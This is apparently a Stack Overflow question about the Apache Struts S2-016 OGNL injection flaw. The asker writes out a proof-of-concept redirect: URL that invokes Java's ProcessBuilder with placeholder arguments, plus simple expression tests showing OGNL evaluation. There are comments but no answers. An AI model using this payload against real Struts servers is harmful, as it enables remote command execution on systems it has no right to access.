Struts S2-016 Injection vulenerability

Asked Dec 15 '15 at 11:19

Active Dec 15 '15 at 13:56

Viewed 391 times

Can someone help me understand the result of this script ?

Actually there is no result after I'm typing this code within my app (Struts 2.2.1.1).

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

otherwise, this part works fine for me and I'm redirect to a new page:

Attack URI:

/xxxx.action?redirect:http://www.google.com/%25{1000-1}

Response Header:

HTTP/1.1 302 Found
Location: http://www.google.com/999

Another one :

http://host/struts2-showcase/employee/save.action?redirect:%25{3*4} <<< 12.jsp

edited Dec 15 '15 at 13:56

Andrea Ligios

49,480
26
114
243

asked Dec 15 '15 at 11:19

fferes

1

Very nice youtube video : https://www.youtube.com/watch?v=_uOtF4SbaoQ – rjdkolb Dec 15 '15 at 12:33
What are you asking? 1. script can start some process on server. – Aleksandr M Dec 15 '15 at 14:06
what is the result of %25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} – fferes Dec 15 '15 at 15:21
See http://stackoverflow.com/q/6856028/1700321 and https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html. – Aleksandr M Dec 15 '15 at 17:57
thank you for your kind reply :) – fferes Dec 15 '15 at 21:29

Struts S2-016 Injection vulenerability

0 Answers0